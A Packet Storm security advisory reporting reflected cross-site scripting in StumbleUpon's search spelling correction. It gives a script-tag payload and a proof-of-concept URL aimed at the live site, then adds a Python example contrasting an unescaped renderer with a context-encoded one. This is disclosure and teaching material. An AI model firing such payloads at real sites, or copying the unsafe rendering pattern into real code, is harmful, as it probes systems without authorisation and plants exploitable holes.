Stumbleupon.com Cross Site Scripting

2010-04-27T00:00:00
ID PACKETSTORM:88970
Type packetstorm
Reporter AutoSec Tools
Modified 2010-04-27T00:00:00

Description

                                        
                                            `|=================================================================================================|  
| ___ ___ ___ ___ ___ ___ |  
| /\ \ /\ \ /\__\ ___ /\ \ /\ \ /\ \ |  
| /::\ \ /::\ \ /::| | /\ \ /::\ \ /::\ \ /::\ \ |  
| /:/\:\ \ /:/\:\ \ /:|:| | \:\ \ /:/\:\ \ /:/\:\ \ /:/\:\ \ |  
| /:/ \:\ \ /:/ \:\ \ /:/|:| |__ /::\__\ /::\~\:\ \ /::\~\:\ \ /::\~\:\ \ |  
| /:/__/ \:\__\ /:/__/ \:\__\ /:/ |:| /\__\ __/:/\/__/ /:/\:\ \:\__\ /:/\:\ \:\__\ /:/\:\ \:\__\ |  
| \:\ \ \/__/ \:\ \ /:/ / \/__|:|/:/ / /\/:/ / \/__\:\ \/__/ \:\~\:\ \/__/ \/_|::\/:/ / |  
| \:\ \ \:\ /:/ / |:/:/ / \::/__/ \:\__\ \:\ \:\__\ |:|::/ / |  
| \:\ \ \:\/:/ / |::/ / \:\__\ \/__/ \:\ \/__/ |:|\/__/ |  
| \:\__\ \::/ / /:/ / \/__/ \:\__\ |:| | |  
| \/__/ \/__/ \/__/ \/__/ \|__| |  
| |  
|=================================================================================================|  
| |  
| Vulnerability............Reflected XSS |  
| Software.................Stumbleupon.com |  
| Date.....................4/26/10 |  
| Site.....................http://cross-site-scripting.blogspot.com/ |  
| |  
|=================================================================================================|  
| |  
| ##Description## |  
| |  
| The code that displays spelling corrections does not encode user submitted data. |  
| |  
| |  
| ##Exploit## |  
| |  
| teh<script>alert(0)</script> |  
| |  
| |  
| ##Proof of Concept## |  
| |  
| http://www.stumbleupon.com/search?q=teh<script>alert(0)</script> |  
| |  
|=================================================================================================|  
`
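The root cause named in the advisory is a "did you mean" renderer that echoes the corrected query into HTML without output encoding. The example below is added here to illustrate that failure mode and its fix; it is not StumbleUpon's code nor AutoSec Tools' code. The spell corrector (`correct_spelling`, a one-entry dictionary mapping `teh` to `the`) is a hypothetical stand-in for whatever the site used, and the page layout strings are constructed. The corrected query is rendered in two HTML contexts, element text and an `href` attribute, and the hardened version encodes each for its own context: `html.escape` for the text node and attribute value, and `urllib.parse.urlencode` for the query string inside the link.

```python
import html
from urllib.parse import urlencode

# Constructed sample input: the query string from the advisory's proof of concept.
SAMPLE_QUERY = "teh<script>alert(0)</script>"

# Hypothetical spell corrector standing in for the site's real one (assumption).
CORRECTIONS = {"teh": "the"}


def correct_spelling(query):
    """Apply the toy correction table; anything unrecognised is echoed back verbatim."""
    corrected = query
    for misspelling, fix in CORRECTIONS.items():
        corrected = corrected.replace(misspelling, fix)
    return corrected


def render_suggestion_unsafe(query):
    """The pattern the advisory describes: raw string interpolation into HTML.

    Whatever survives the spell corrector lands in the page as markup.
    """
    corrected = correct_spelling(query)
    return (
        '<p>Did you mean: <a href="/search?q=' + corrected + '">'
        + corrected + "</a>?</p>"
    )


def render_suggestion_safe(query):
    """Hardened renderer: encode the value separately for each output context.

    - Text node and attribute value: HTML entity encoding (quote=True also
      handles the double quote that would otherwise close the attribute).
    - Query string inside the link: percent-encoding via urlencode, so the
      browser receives a well-formed URL and no raw '<' or '>' reaches the DOM.
    """
    corrected = correct_spelling(query)
    link = "/search?" + urlencode({"q": corrected})
    return (
        '<p>Did you mean: <a href="' + html.escape(link, quote=True) + '">'
        + html.escape(corrected, quote=True) + "</a>?</p>"
    )


def echoes_raw_markup(user_input, rendered):
    """Cheap regression check: does any '<' or '>' from the input reach the page
    unencoded? Useful as a unit-test guard on templates that render user data."""
    if "<" not in user_input and ">" not in user_input:
        return False
    return "<script" in rendered.lower() or "</script" in rendered.lower()


if __name__ == "__main__":
    print("unsafe:", render_suggestion_unsafe(SAMPLE_QUERY))
    print("safe:  ", render_suggestion_safe(SAMPLE_QUERY))
    print("unsafe echoes markup:", echoes_raw_markup(SAMPLE_QUERY, render_suggestion_unsafe(SAMPLE_QUERY)))
    print("safe echoes markup:  ", echoes_raw_markup(SAMPLE_QUERY, render_suggestion_safe(SAMPLE_QUERY)))
```

Running the module prints both renderings side by side; the unsafe one contains a live `<script>` element, the safe one contains only `&lt;script&gt;` in the text node and `%3Cscript%3E` in the link. Escaping per context matters: HTML-escaping the whole link would leave `<` inside the query string untouched by the URL parser, and URL-encoding the text node would display garbage to the user.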